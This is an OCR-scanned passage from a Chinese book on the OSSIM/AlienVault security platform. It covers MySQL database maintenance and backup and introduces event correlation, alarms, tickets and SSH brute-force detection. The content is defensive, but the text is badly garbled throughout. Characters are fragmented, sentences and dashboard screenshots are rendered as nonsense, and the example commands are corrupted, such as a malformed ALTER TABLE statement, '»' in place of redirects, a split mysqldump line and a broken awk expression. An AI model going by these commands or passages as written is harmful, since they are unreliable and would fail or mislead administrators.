保存 文件 后 重启 MySQL 服务 器 即 可 ， 接 着 就 可 以 查看 日 志 了 : 

#tail -f /var/log/mysql/mysql.log 


当 打 开 OSSIM Web UI 后 ， 查 询 日 志 就 会 不 停 地 增长 ， 注 意 : 这 个 功能 会 消耗 系统 性 能 ， 
建议 在 负载 较 小 时 使 用 。 


16. 如 何 优化 表 

alienvault.event 表 数 据 比较 大 ， 随 着 更 新 和 删除 反复 操作 ， 数 据 在 磁盘 上 的 存储 位 置 将 会 
变 得 分 布 不 均 ， 同 时 会 增加 在 该 表 中 进行 搜索 的 时 间 。 在 MySQL 底层 设计 中 ,数据库 将 被 映 
射 到 具有 某 种 文件 结构 的 目录 中 ， 而 表 则 映射 到 文件 ， 所 以 很 有 可 能 产生 磁盘 碎片 ， 如 果 直 接 
使 用 “optimize table event” 命 令 ， 系 统 会 提示 “Table does not support optimize”， 表 示 不 支持 
优化 ， 应 采取 以 下 方法 优化 ， 操 作 主 要 过 程 如 图 3-23 所 示 。 

mysql»alter table event ENGINE-' InnoDB' ; 

mysql»analyze table event; 


图 3-23 优化 表 


17. 如 何 使 用 mysqldump 备份 数据 库 
首先 确保 有 足够 磁盘 空间 ， 然 后 开始 完全 备份 ， 如 图 3-24 所 示 。 


#mysqldump -u root -ppassword --all-databases »/root/mydump-2015-2-10.sql 


226 


图 3-24 用 mysqldump 备份 数据 库 
下 面 ， 开 始 重 建 数 据 库 : 


#alienvault-reconfig -c --rebuild db 


alienvault-reconfig 是 一 条 命令 ， 它 等 同 于 ossim-reconfig A4, JEH- "—rebuil db” 为 参 XN 
之 间 用 空格 隔 开 ， 这 个 脚本 执行 过 程 比较 复杂 。 首 先 它 会 备份 ossim-setup.conf 配置 文件 ， 更 
新 /etc/issue、/etc/motd.tail、 更 新 Framework Profile、 更 新 Cron 文件 、 配 置 Sensor Profile、 更 
新 OSSEC 插件 的 reference。 完 成 这 一 系列 动作 之 后 ， 重 启 ossim-server. squid3. Nagios3. 
nfsen、ossim-agent 服务 ， 直到 最 后 配置 完成 。 下 一 步 导 入 备份 , 备份 命令 例子 如 图 3-25 所 示 。 


#mysql -u root -ppassword < /root/mydump-2015-2-10.sql 


备份 命令 例子 J 
改进 方法 : 


VirtualUSMAllIn0ne:-4 mysqldump -p'grep ^pass /etc/ossim/ossim setup.conf | sed 's/pass-//' 
nsaction databases alienvault | gzip > alienvault.sql.gz 

VirtualUSMAllInOne:- ll 

total 1339648 


一 no-autocommit —-single-tra 


root root 41227195 Feb 21 04:54 alienvault.sql.gz 
root root 664471111 Feb 21 03:24 alienvault dump.sql 
root root © Feb 21 03:39 alienvault dump.sqlcv 
root root 664275825 Feb 21 03:39 alienvoult dump. 
-rw-r--r— 1 root root 8065 Feb 20 21:59 pci-toplogy 
rw-r--r— 1 root root 1801988 Nov 19 2012 perc oolkit 2.1 


Ea mep 后 面 的 “” 代 表 首 行 匹配 


恢复 方法 : 执行 命令 zcat alienvault dump.sql.gz |ossim-db， 其 操作 过 程 如 图 3-26 所 示 。 


小 结 


本 章 首先 分 析 了 OSSIM 数据 库 的 结构 以 及 作用 ， 详 细 讲 解 了 本 地 和 远程 主机 访问 数据 库 
的 注意 事项 ， 以 及 讲解 数据 库 性 能 分 析 工 具 和 监控 、 优 化 及 迁移 的 方法 。 最 后 讲解 了 维护 
OSSIM 数据 库 的 常见 问题 。 
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第 4 章 
< OSSIM 关 联 分 析 技 术 > 


从 本 章节 可 以 学 习 到 : 

关联 分 析 

不 同 种 类 日 志 的 关联 分 析 
OSSIM 关联 引擎 

事件 聚合 及 举例 

海量 事件 处 理 
关联 分 析 分 类 

通用 关联 检测 规则 

新 建 OSSIM 关联 指令 
OSSIM 自 定义 策略 


关联 分 析 技术 背景 


企业 对 自身 网 络 安全 日 益 重 视 ， 入 侵 检测 系统 (IDS)、 防 火 墙 〔Firewall)、VPN 等 网 络 
安全 设备 被 部 署 在 企业 网 络 中 , 但 它们 的 作用 未 达到 预期 , 由 于 技术 实力 存在 不 足 ， 所 以 难以 
很 好 地 解决 网 络 安全 问题 ， 同 时 还 会 带 来 新 的 问题 。 


4.1.1. 当前 的 挑战 

许多 安全 管理 者 抱怨 ， 已 经 设置 了 防火 墙 、 入 侵 检测 、 防 病毒 系统 、 网 管 软件 ， 为 什么 网 
络 安全 管理 仍 很 麻烦 。 当 前 网 络 安全 管理 者 面临 如 下 挑战 

(1) 安全 设备 和 网 络 应 用 产生 的 安全 事件 数量 巨大 ，IDS 误 报 严重 。 一 台 IDS 系统 ， 
天 产生 的 安全 事件 数量 成 千 上 万 ， 通 常 99% 的 安全 事件 属于 误 报 ， 而 少量 真正 存在 威胁 的 安 
全 事件 淹没 在 误 报信 息 中 ， 难 以 识别 。 

(2) 安全 事件 之 间 存 在 的 横向 和 纵向 方面 《如 不 同 空间 来 源 、 时 间 序 列 等 ) 的 关系 未 能 
得 到 综合 分 析 ， 因 此 漏 报 严重 ， 不 能 实现 实时 预测 。 一 个 攻击 活动 之 后 常常 接着 另 一 个 攻击 活 
动 ， 前 一 个 攻击 活动 为 后 者 提供 基本 条 件 ; 一 个 攻击 活动 在 多 个 安全 设备 上 产生 了 安全 事件 
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多 个 不 同 来 源 的 安全 事件 其 实 是 一 次 协作 攻击 ， 这 些 都 缺乏 有 效 的 综合 分 析 。 
(3) 安全 管理 者 缺乏 对 整个 网 络 安全 态势 的 全 局 实时 感知 能 力 。 


4.1.2 ”基本 概念 

充分 利用 多 种 安全 设备 的 检测 能 力 , 集中 处 理 的 致命 弱点 是 待 分 析 处 理 的 数据 量 巨大 , 屠 
些 庞大 宛 余 ， 独 立 分 散 ， 安 全 事件 显然 不 能 直接 作为 响应 依据 ， 同 时 网 络 安全 防护 也 有 实时 性 
要 求 ， 上 述 问题 的 根本 解决 途径 是 网 络 安全 事件 关联 处 理 。 到 底 什么 是 关联 分 析 呢 ， 有 几 个 基 
本 的 概念 大 家 需要 了 解 。 


(1) 安全 事件 : 第 1 章 开始 就 提 到 了 安全 事件 ， 包 括 服务 器 安全 日 志 ， 重 要 应 用 的 告警 
以 及 日 志 。 
(2) 数据 源 〈Date Source): 数据 源 是 安全 事件 的 来 源 ， 这 里 包括 防火 墙 、 入 侵 检 测 系 统 ， 
重要 主机 、 路 由 交换 设备 的 日 志 。 
G) 数据 关联 : 将 多 个 数据 源 的 数据 进行 联合 (Association)、 相 关 〈Correlation ) 或 组 
fr (Combination). 分析 ， 以 获得 高 质量 的 信息 。 它 将 不 同 空间 设备 的 日 志 ， 不 同时 间 序 列 存 
在 的 问题 经 过 特定 关联 方法 结合 在 一 起 , 最 终 确定 工具 的 分 析 方法 。 当 然 这 些 只 是 广义 的 安全 
事件 关联 方法 ， 后 面 章节 还 会 专门 针对 OSSIM 讲解 具体 的 规则 。 
(4) 交叉 关联 : 它 是 最 常见 的 数据 关联 方式 ， 可 以 将 安全 事件 与 网 络 拓扑 、 系 统 开 放 的 
服务 、 设 备 存在 的 漏洞 进行 关联 匹配 ， 以 分 析 攻 击 成 功 的 可 能 性 。 利 用 这 种 关联 方法 可 以 在 
OSSIM 系统 中 关联 规则 检测 到 某 些 威胁 ， 并 实现 自动 响应 〈 比 如 发 出 告警 等 )。 
下 面 举 几 个 异常 实例 : 
@ 完整 性 方面 。 文件 完整 监控 工具 发 现 系统 中 Is ps, netstat, su 等 程序 大 小 和 所 有 者 
被 改变 ， 可 判断 受到 攻击 。 

@ 系统 方面 。 用 户 账 号 被 修改 及 一 些 不 能 解释 的 异常 登录 行为 ， 在 不 可 能 的 地 方 出 现 
了 新 的 文件 、 目 录 或 者 丢失 了 文件 、 目 录 大 小 急速 增 大 、 了 骤然 减 小 、MD5 ZERE 
配 ， 这 些 迹象 都 说 明 系 统 已 遭受 入 侵 。 

€ 日 志方 面 。 系统 日 志 缩 减 ， 日 志 中 出 现 了 不 明 条 目 、 央 常 的 中 断 消息 都 说 明了 系统 
ERAS. 

e RED., ETIA AEKA KATET b GEAR AR SC. 


4.4.8 ”安全 事件 之 间 的 关系 

上 述 这 些 状况 看 似 孤立 , 实际 有 着 联系 ,因为 攻击 者 表面 上 的 单个 攻击 行为 可 以 在 多 个 
地 方 产生 安全 事件 , 比如 攻击 者 从 外 网 非法 访问 数据 库 , 那么 攻击 者 经 过 路 径 中 的 所 有 应 用 程 
序 及 安全 设备 都 会 记录 这 种 异常 行为 的 日 志 。 所 以 网 络 中 安全 事件 的 关系 大 致 分 为 :并 列 关系 ， 
时 间 序 列 关 系 (首先 扫描 到 目标 , 然后 根据 目标 开放 端口 进行 针对 扫描 〉 和 元 余 关系 (针对 单 
个 目标 的 多 个 端口 或 多 个 目标 的 多 个 端口 的 扫描 行为 ， 即 会 触发 多 个 安全 事件 )。 
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关联 分 析 基 础 


4.2.1 ”从 海量 数据 到 精准 数据 

根据 ISO 27001 的 定义 ， 事 件 关联 分 析 就 是 指 用 户 将 海量 安全 事件 ， 进 行 相关 性 分 析 
定位 真正 故障 点 的 过 程 。 那么 海量 数据 并 结合 复杂 类 型 就 形成 了 大 数据 。 下 面 讲 到 的 实质 就 是 
大 数据 分 析 的 一 部 分 内 容 。 

表 4-1 展示 了 一 组 攻击 状态 下 的 模式 和 每 个 模式 所 具有 的 特征 集 , 事件 关联 分 析 就 是 要 将 
这 些 模式 和 特征 进行 提炼, 找 出 问题 和 内 在 联系 。 这 种 分 析 难度 已 超越 了 我 们 以 前 利用 正则 表 
达 式 过 滤 日 志 的 难度 ， 所 有 这 些 事件 日 志 代表 着 扫描 、 攻 击 、 漏 洞 利用 或 服务 器 故障 的 形式 ， 
而 通过 人 工 查询 日 志 的 方法 很 难 找 出 关联 问题 。 


表 4-1 RSME VRTE, XERE) 
端口 扫描 


» 
过 
E 
Ed 
kk 
xi 


Li 
[1 


大 量 出 站 流量 
大 量 入 站 流量 
[ 作 时 间 登 录 VPN 
防火 墙 Access 


x 
PEN i; 


|x |x |x |x [S]A ]|x 
2 fx |x | 二 [x | 二 | 二 


从 内 网 之 外 登录 
连续 多 次 登录 失败 

至 少 一 次 登录 成 功 

单一 来 源 探测 多 个 目标 IP 
单一 来 源 探测 多 个 IP 及 端口 


OSSIM 的 核心 技术 之 一 就 是 关联 分 析 ， 通 过 这 项 技术 能 够 挖掘 出 海量 的 安全 日 志 中 隐藏 
的 信息 ， 这 样 可 以 帮助 安全 人 员 发 现 入 侵 行为 ， 本 章 将 深入 为 读者 剖析 关联 技术 及 应 用 。 

下 面 举 一 个 例子 : 一 个 拥有 500 台 PC 的 中 小 型 企业 ， 其 网 络 安全 产品 每 天 产生 的 事件 估 
算数 量 ， 如 表 4-2 所 示 。 


表 4-2 企业 日 志 产量 统计 


安全 目标 安全 产品 HAF UR) 
网 络 内 网 安全 桌面 管理 系统 


防 病毒 服务 器 、 防 病毒 网 管 近 50000 条 
交换 机 、 路 由 器 大 于 1000 条 
网 络 安全 IDS/IPS 大 于 500000 条 
Biki EEH KF 2000000 % 
保护 关键 业务 主机 审计 、 应 用 审计 大 于 100000 % 
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如 果 简 单 地 将 这 些 日 志 全 部 收集 起 来 ， 而 不 进行 关联 分 析 ， 对 于 潜在 安全 事件 还 是 束 手 无 
策 ， 对 运 维 效率 来 说 不 升 反 降 。 因 此 ， 安 全 管理 评估 不 仅 要 收集 这 些 海量 事件 ， 还 要 通过 关联 
分 析 引 擎 进行 事件 “提纯 ”， 也 就 是 输出 很 少量 的 、 真 正 值得 管理 员 关 注 的 安全 事件 ， 如 图 
4-1 所 示 。 


10,000 条 一 sire 


T 1,000,000- 


图 4-1 Alarm 的 提取 


从 图 4-1 中 可 以 看 出 IDS 系统 产生 的 Alerts 和 Alarms, 我 们 通过 在 OSSIM 中 , 对 比 SIEM 和 
Alarm 的 数值 可 知 。 同 时 读者 也 可 观察 Dashboards 一 Overview 一 Executive 中 图 形 化 显示 的 SIEM 
和 事件 数量 ,他 们 和 Alarm 都 不 在 一 个 数量 级 。 同 样 在 SIEM :TOP 10 的 事件 分 类 饼 图 中 , MAR 
件 之 和 等 于 总 SIEM 的 数量 。 对 这 些 现象 来 说 ， 在 它们 之 间 起 到 关键 作用 的 就 是 关联 引擎 。 


4.2.2 网络 安 全 事件 的 分 类 

网 络 攻 击 具有 多 种 表现 形式 及 不 同 的 危害 , 对 不 同 攻击 产生 的 安全 事件 进行 分 类 , 具有 显 
著 的 意义 。 基 于 统计 的 分 类 方法 ， 如 根据 安全 事件 相同 源 的 数量 、 相 同 目的 的 数量 、 相 同 目的 
端口 的 数量 等 进行 统计 分 类 ， 这 样 就 可 看 出 应 关注 的 一 些 源 、 目 标 、 目 标 端口 等 ， 通 过 它们 来 
发 现 异常 。 在 OSSIM 的 Report 报表 菜单 中 (或 者 在 Analysis Alarm 中 的 Alarm Report 报表 ) 
可 根据 安全 事件 的 源 和 目的 IP， 得 到 十 分 详细 的 统计 分 类 ， 如 图 4-2、 图 4-3、 图 4-4 所 示 。 


ALARMS - TOP 10 ATTACKED HOSTS 


HOST OCCURRENCES 


Host-192-168-11-95 7 : 
Host-192-168-11-89 A 2 5 
VirtualUSMAllInOne 2 4 
ill 119.188.94.173 : 
192.168.45.66 EN 
A 1 1 


= 29.5.57.123 


E 192.114.214.225 


119.188.94.173 E 


29.5.57 .123 E 
192.114.214.225 E 


t-192-168-11-95 
t-192-168-11-89 


Ela ”被 攻击 次 数 最 多 的 10 个 主机 CAttacked) 
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ALARMS - TOP 10 ATTACKER HOSTS 


HOST OCCURRENCES 
Host-192-168-11-95 6 
ii 186.113.77.78 
im 186.118.61.96 
imi 190.252.165.136 


22523958211 


lm 
EE 
| 


190.164.121.231 | — 


190.222.156.240 |- 


5.239.58.211 | — 


E 
g 
J 
à 
8 
b 
3 


5 


a 190.164.121.231 
EE 151.66.59.125 
Host-192-168-11-3 


1 
1 
1 
1 
VirtualUSMAIIInOne 1 9 
1 
1 
1 
1 


186.113.77.78 | — 
tualUSMAllInüne | — 
181.66.59.125 | — 
st-192-168-11-3 | — 


186.118.61.96 
190.252.165.136 


Ep 190.222.156.240 
图 4-3 发 出 攻击 最 多 的 10 个 主机 (Attacker) 


ALARMS - TOP 10 DESTINATION PORTS 


PORT SERVICE OCCURRENCES 
445 microsoft-ds 

1794 unknown 

2846 unknown 


4174 unknown 


1167 phone 


1772 unknown 


22 ssh 


445 
1794 
2646 
4174 
4277 
1167 
1772 

22 
3128 
80 


3 
1 
1 
1 

4277 unknown 1 1.0 
1 
1 
1 
3128  squid-http 1 
1 


80 http 


图 4-4 攻击 的 目标 端口 


1E OSSIM 系统 中 ， 所 有 原始 日 志 收 集 到 Analysis? RAW Logs 下 ， 通 过 柱状 图 展示 出 来 ， 
日 志 详 情 存 储 在 /var/ossim/logs 目录 下 ， 经 过 归 一 化 处 理 后 的 事件 存放 在 alienvault siem 库 的 
acid_event 表 中 ， 展 示 在 Web UI 的 Dashboards 一 Overview 一 Executive， 以 及 Dashboards 一 
Overview 一 Security 页 面 上 。 经 过 系统 筛选 出 的 事故 ， 则 存储 在 alienvault 库 的 alarm 表 中 ， 展 
示 在 Analysis 一 Alarm 中 。 

在 没有 用 到 OSSIM 之 前 , 我 们 会 通过 类 似 grep "Failed password for root" /var/log/auth.log | 
awk ' (print $11)" | sort | uniq -c | sort -nr | more 的 命令 显示 登录 失败 的 统计 信息 ， 如 果 频 繁 出 现 
问题 ， 那 么 操作 会 变 得 比较 烦琐 。 下 面 我 们 看 看 OSSIM 是 如 何 处 理 。 我 们 抽取 一 条 存储 在 
/varlog/auth.log 中 Ssh 登录 失败 的 原始 日 志 ， 以 及 归 一 化 处 理 后 的 事件 进行 对 比 ， 如 图 4-5、 
图 4-6 所 示 。 
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pure AUENVAULT SENSOR mrarac 
301411 04 600 12 GMT S00 shemveuk 032 14.133] ero 
TRIGGERED SIGNATURE VENT WPEID CATEGORY SUB.CATEGORY 
ER ' umereemnon Faro 
NORMALIZED f x 
EVENT / N 
sm PRODUCI me DATA SOURCE i 
/ - Y pn e, 
j V 
souteo orsmanon anoss oesnwarnow poar aorocot 
Ee CENE p Te 
UNIQUE Eve oe p siam sk 
| - 一 cus 
ji 646511049154 000c2901.fec391838333 p SES gi: $ 
SIEM mm 
/ USERNAME \ USERDATAZ 
/ E ut 


j gd I 
RAW LOG: Nov 4 16:00:12 alienvault Sshd[21170]: Failed password for root from 10.32.14.131 port(50099 


ssh2 
图 4-5 SSH 原始 日 志和 归 一 化 处 理 的 对 比 
DASHBOARDS ENVIRONMENT REPORTS CONFIGURATION 
ALARMS 
, 935323594 siena rd 106) Fa pasar fer rot fem i 
47 010511604 nn coooa: amenas DHILLON DA NN Ld dre 
RO."STIG. PL Sy 
98 acuanosorieos s o Wd cono 17.181 105 Red." MC. “SSHD authentication failed, Lo mann 
anemia Tei Hi ss I ON bendi LOCATION: 
TICKETS 
53 18:893 alenvauk sshd 195) Palled password fer root from 
49 300106 123604 ET sel TEST enooa mman PITIT RP "WI 
A B10 2014005 114694 she out 192168.41.4812512 co0022 vates tos 3 "T 
Pvewrrme su orman 
sid SSH. Faled ponord - suse sa 
sensor Prouet nee curreomv sumcwrtcomy 
eetimat Sanar Aaronacman Fold 
sepan useasta atacar usranatas Jstmoare m— usEsoarhs UsEhphra 
515131804 alervaut ss 52037 Fuld password for root fom 
A.M. mamas 4604 E ceat isens 600022 manis BETET on Ai nna "mm 
ut sshgls212} Paled password fer roor from 
ALT. 004006 124694 she oma? 092468114512515 000022 vun os iM LJ aves 
0c 5 13-1605 aient sshd S221) Failed password for root from 
db 0141005 1346€ se ow 02168 14114512518 G00022 amman en "a 


图 4-6 RAW His 


事件 序列 关联 可 以 从 诸多 安全 事件 中 , 找 出 属于 同类 攻击 意图 的 多 次 攻击 活动 (例如 暴力 
破解 ) 对 应 的 安全 事件 ， 比 如 对 于 SSH 的 暴力 破解 ， 如 图 4-7、 图 4-8、 图 4-9 所 示 。 
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events om ve 
GROUP events sv (samua — 1$ 
DISPLAVING EVENTS 1-10 OF ABOUT IO N c YOUR on 256.273 TOTAL EVENTS IN DATABASE. 
SGNATURE TDPie UNOUESRCh  UNIQUEOSTA LATESTEVENT cnin 
局。 SSH. Feceived doconnect nar 1 3 20141110225628 
L 88d. Login sucessful Accepted publickey [USERNAME] z191 1 2 2012-49225323 
SEG Address nct mapped soo 2 2 201239225824. 
© SSH Login sucesstu, Acceotac publickey aes 1 ` 201110225628 
KO ossia nyald user LE 1 2 2014111225826 
ssh Falled password 194 2 2 2014110225826 
SSH Bad protaal version identification n 1 2 202510225728 
ALARMS o 
MSTVIEM — GROUP wew 
All Arm + Delvery & Attack (2014:11:10 12h — 2014:13:10 158) Next refrish in 286 secondi. OF a te ralresh now 
P SEARCH AND FILTER we 
310AV& 14-11-04 1411-05 1-1106 14-1107 14-11-08 2einos E 


Delivery & Attack 


SHOW (28.79) ENTRIES 
2014.11.10 12h — 20141170 15h 
DME = STATUS $ INTENT & STRATEGY $ memoo $ ms ATTACK PATTERN SouncE $^ nu ERE VETERE EE 


emni QU Qr aieo Nihenteation p : ge REUTERS ein 
WebServer tack SQ jen 


orsa CLOSED A TOTAL EVENTS tarsio TE 
DELIVERY & ATTACK: ERUTEFORCE 
AUTHENTICATION 171 6 
ATTACK PATTERN EXTERNAL TO EXTERNAL ONE-TO-ONE E €: 
4-8 攻击 类 事件 
ALARMS o 
Usrvew aroue VIEW 
* Search and filter 
5HOW (6T) ENTRIES 
十 srov owner Hengsrmsx orscuemon SUUS acmon 
。 o irtatoce annenin — ssh tme) eu n [— — — —M i " 


= referee Authentication — Unsinn © tama Ti i CC o 5 


ALARM NAME EveNrs sx DURATION source Destination E ACTION 
^^ DelveyBAtadk— SruteforceAuthenikation- Lia/Umk 179 ` amO 1923683129 19215811117 Open ü 
© Debvery A Attack — Bruteforce Authentication — Limur sac a Tt [ITE Jezi68 10220 Open n 
$ Delvery & Attack — Gruteferce Authentication — Linux/Unix E 1 nm 1921681128 3923581028 Open B 


图 4-9 告警 分 组 (聚合 ) 显示 
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4.2.3 Alarm 与 Ticket 的 区 别 


Ticket 用 在 行车 中 由 于 司机 违规 ， 由 交警 开 出 的 罚单 。Ticket 可 视 为 一 种 更 紧急 的 报警 类 
型 ,系统 发 现 威胁 或 严重 漏洞 后 给 管理 员 的 提示 ,这 里 是 指 系统 发 现 了 严重 漏洞 并 报 给 管理 员 。 
查看 Ticket 如 图 4-10 所 示 。 


DASHBOARDS ENVIRONMENT REPORTS 


ALARMS 
TICKETS 
SECURITY EVENTS (SIEM) 
RAW LOGS VANCED FILTERS [SWITCH TO SIMPLE] MM 
Class Type n charge Status Priority 
TICKETS : 
ALL z pa = [Open E AL [s 
with Submitter with Tide with Attachment Name with Tag 
[ z 
r noe mme PRIORITY CREATED LIFETIME — IN CHARGE SUBMITTER TYPE jj 
T^ aws AV Malware, suspicious user-agent detected on SRC JP Q e mem 
T wuz nessus: Microsoft IIS FTPA NLST stack overflow Q se m P 
T wus @ 20150215213742 11Days1733 admin openvas 


tta Nessus: Vulnerabilities in Microsoft ATL Could Allow Remote Code Execution 2015021521942. 3 
T wus 1573908) Q 95227 


D wus nessus: OS End Of Life Detection (152 368 13.95 Q 52042 11Days1733 admin opere 
图 4-10 Tickets 显示 


通常 发 生 了 Ticket 它 的 优先 级 都 较 高 (通常 >5)， 可 通过 Ticket 给 管理 员 发 送 邮件 提醒 ， 
其 目的 是 在 攻击 者 成 功 入 侵 网 络 之 前 ， 第 一 时 间 提 醒 问 题 发 生 了 ， 促 使 管理 员 去 锁定 故障 源 。 

前 面 讲 过 ,Alerts>>Alarms GER: 符号 “>>” 表 示 远 大 于 ), 我 们 再 深入 思考 一 下 , OSSIM 
系统 在 什么 情况 发 会 发 出 Alarm? 进 过 分 析 发 现 ， 当 系统 检测 到 事件 的 风险 大 于 1 时 , 将 产生 
报警 (alarm )， 那 风险 Risk 的 计算 就 显得 很 重要 。 而 且 在 SIEM 事件 分 析 控 制 台 中 用 3 个 级 别 


来 描述 风险 等 级 ， 


分 别 是 ， 低 级 别 Risk<1; 中 级 别 Risk 三 1， 高 级 别 High 


z3. ! 

从 数量 上 看 Alerts>>Alarms>>Tickets，Ticket 是 从 众多 events, alarm 里 提取 的 精华 。alarm 
只 是 提取 一 个 事件 ， 并 根据 风险 程度 来 创建 一 个 通用 报警 ， 以 供 查 看 。 报 警 不 会 分 配给 系统 用 
P, {B Ticket 可 以 分 配给 系统 用 户 ,例如 admin， 还 能 给 出 更 精细 的 控制 ， 比 如 发 送 邮 件 给 某 
个 用 户 。 将 它们 两 个 的 联系 可 以 放 在 一 张 图 上 进行 对 比 ， 如 图 4-11 所 示 ， 这 是 在 OSSIM Web 
UI 下 仪表 盘 中 的 Alarm 和 Tickets 的 对 比 。 
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UNRESOLVED ALARMS VS OPENED TICKETS — 7 


Alarms 


Tickets 
6 Alarms @ Tickers 


图 4-11 Alarm !j Tickets 数量 对 比 的 柱状 图 


这 里 指 的 是 对 于 严重 的 漏洞 ， 系 统 需 要 创建 一 个 票据 系统 ， 通 常用 Tickets 表示 ， 它 的 值 
是 1~9， 这 个 值 可 以 自己 修改 。 如 果 改 成 “1”， 那 么 在 一 次 扫描 中 很 可 能 获得 成 千 上 万 条 的 
tickets。 面 对 诸多 信息 ， 如 何 甄别 ? 在 实际 工作 中 ， 发 现 设置 为 “7” 或 “8” 比 较 适合 。 


4.24 使 用 Ticket 


在 实践 中 发 现 ，Ticket 除了 系统 识别 的 以 外 ， 我 们 还 能 手动 添加 新 的 Tickets. E SIEM 控 
制 台 上 选中 某 个 事件 并 添加 ， 如 图 4-12 所 示 。 


EVENTS 


ocra Wor 


大 Events 中 手动 添加 ticket 


mies CON EMT Eon Meus — 
$ 万 SSHd: Failed password 2015-02-26 22:42:07 VirmualusMAmWnone ^ Host-192-168-11-3:60610 VirtualUSMAIlInOne-22 


图 4-12 手动 添加 Ticket 
接 下 来 弹出 如 图 4-13 所 示 的 对 话 框 ， 用 户 需 要 填写 名 称 、 优 先 级 、 类 型 等 信息 即 可 完成 
注册 。 


NEW EVENTTICKET 


NEW TOGET 
i SAE Patea Paroword 
ee ser [aii IE] ox eine ER E 
rom. cm — 
Tee- oris - 
EXE 
osr es 5 


START OF RELATED EVENTS. 


4-13. Æ Ticket 举例 
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接着 ， 在 Tickets 中 的 筛选 条 件 中 选择 events 类 (注意 还 包括 Vulnerability、Anomaly、 
Metric, Event, Alarm 等 其 他 类 )， 即 可 立刻 将 刚才 建立 的 tickets 展示 出 来 ， 如 图 4-14 所 示 ， 
而 且 在 Dashboards 一 Overview 一 Tickets 中 可 以 查看 到 各 种 以 Tickets 为 主题 的 报表 。 


TICKETS 


图 4-14 £f Ticket 


4.25 加 入 知识 库 

最 后 , 我 们 可 以 将 典型 的 Tickets 新 建文 档 加 入 到 系统 知识 库 中 , 知识 库 在 企业 漏洞 管理 中 
尤为 重要 ， 在 默认 的 OSSIM 系统 中 具有 1763 条 目 ， 可 以 根据 自身 情况 添加 知识 库 信 息 。 还 
是 以 上 面 的 事件 为 例 ， 我 们 单 击 Tickets 中 的 “SSHd Failld password” 出 现 如 下 画面 ， 再 单 击 
“NEW DOCUMENT” 创 建新 文档 ， 如 图 4-15 所 示 。 


Tickets SSHd: Failed password 


TICKET DETAILS 
mor iD Tor STATUS. PRIORITY KNOWLEDGE DB ACTION 
Name: w . DOCUMENTS 2" 
Class: 
Type: 
Created: 
Last Update: 00.05 


图 4-15 新 建文 档 
打开 对 话 框 ， 如 图 4-16 所 示 ， 根 据 一 定语 法 规则 加 入 描述 信息 ， 以 及 上 传 附件 信息 。 注 
意 : 目前 KDB 还 不 支持 中 文 。 


TERES AV üroteforce attack, SSH a LANCUACE DEFINITIONS HELP 


7 


SDsTpoRT 


SSRCCRITICALITY 
SosTCRmICALTY 


Selects Enguage element irom te lists io see ds meening. 
Gic on Tu rererences mi cese of need a More Getalled 


ee PER attack authentication Eruteforce password authentcaton 


4-16 添加 进 KDB 
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426 ”安全 事件 提取 

如 何在 庞大 日 志 中 提取 出 真正 人 们 感 兴趣 的 事件 ,并 最 终 形 成 安全 事件 告警 呢 ? 这 就 是 事 
件 的 提取 过 程 ， 从 第 1 章 介 绍 OSSIM 结构 得 知 ，Sensor 中 具有 代理 功能 ， 主 要 负责 日 志 采集 
并 进行 归 一 化 处 理 , 形成 统一 的 安全 事件 格式 ， 下 面 紧 接着 要 做 的 处 理 就 是 由 聚合 模块 消除 宛 
余 安 全 事件 ， 再 由 交叉 关联 与 序列 分 析 等 模块 进行 更 深层 次 的 关联 。 

下 面 我 们 再 看 几 个 关联 分 析 场 景 举例 : 

CD 比如 在 VPN 服务 器 日 志 显示 张 三 3:00 点 钟 ， 从 外 网 登录 到 内 部 网 ，3:05 分 登录 FTP 
服务 器 ， 并 在 FTP 服务 器 上 下 载 了 某 一 文件 。 在 门禁 系统 的 日 志 显示 张 三 在 不 久 前 刚刚 进入 
办 公 区 域 ， 这 三 个 日 志 可 以 关联 出 一 个 安全 事件 。 

(2) 某 公司 核心 数据 库 前 端 部 署 了 防火 墙 系统 ， 拓 扑 示意 如 图 4-17 所 示 ， 某 日 安全 系统 
监测 发 现 张 三 登录 了 MySQL. 数据 库 服务 器 ， 但 是 在 防火 墙 日 志 中 并 没有 发 现 张 三 的 访问 日 
志 ， 则 说 明 张 三 很 有 可 能 绕 过 防火 墙 直 接 登 录 数 据 库 服务 器 。 
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防火 境 日 志 中 并 没有 T 
发 现 张 三 的 访问 日 吉 
me à 
Aën a 
mysa | 


4-17 关联 分 析 场景 举例 


(3) 网 络 中 OpenVas 扫 到 某 台 Linux 主机 存在 Apache 2.2.x Scoreboard (本 地 安全 限制 绕 
过 ) 漏 洞 , 与 此 同时 , NIDS 检测 到 了 一 个 正在 对 该 主机 漏洞 的 尝试 攻击 事件 , 如 果 此 时 该 Linux 
服务 器 打上 了 相应 补丁 ， 则 关联 分 析 结 果 为 低 风险 值 ， 并 不 会 报警 ， 如 果 没 有 打 补 丁 ， 此 时 审 
计 系 统 就 会 报警 。 

对 于 每 套 系统 管理 都 有 它 的 安全 防护 措施 , 只 不 过 是 安全 孤岛 , 但 是 万 物 之 间 必 然 有 它 的 
联系 , 将 这 些 日 志 联 系 到 一 起 分 析 , 就 是 我 们 上 面 讲 的 关联 分 析 ，, 这 里 关联 的 好 坏 就 决定 于 它 
的 关联 库 、 关联 规则 和 知识 库 。 但 是 也 有 个 矛盾 , 关联 分 析 规 则 加 载 得 越 多 , 对 系统 影响 越 大 ， 
加 载 数量 不 够 , 也 起 不 到 作用 。 所 以 对 于 每 个 厂商 而 言 ， 所 使 用 的 算法 和 关联 分 析 引 擎 各 不 相 
同 ， 没 有 统一 的 标准 。 


4.2.7 OSSIM 的 关联 引擎 
为 了 达到 安全 事件 关联 分 析 的 目的 ,就 要 有 好 的 事件 处 理 机 制 ， 比 如 前 面 讲 的 日 志 收集 的 
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归 一 化 处 理 , 还 得 有 好 的 关联 方法 , 而 且 不 止 一 种 关联 方法 , 将 多 种 实时 关联 方法 结合 到 一 起 
效果 更 佳 。 大 量 标准 化 处 理 的 事件 被 送 入 关联 引擎 处 理 后 ， 它 们 会 经 历 事件 分 类 处 理 、 聚 合 、 
交叉 关联 、 启 发 式 关联 等 多 种 关联 方法 ， 系 统 会 根据 数据 库 中 的 安全 事件 进行 统计 分 类 ， 找 出 
经 常 导致 安全 事件 的 发 源 地 和 经 常 被 攻击 的 端口 , 在 这 些 阶段 都 会 产生 事件 告警 , 其 安全 事件 
关联 过 程 模块 如 图 4-18 所 示 。 


1 
1 
I 
I 
I 
1 
I 
L 


报警 数据 库 


大 量 低级 别 安 全 事件 


图 4-18 ”关联 模块 


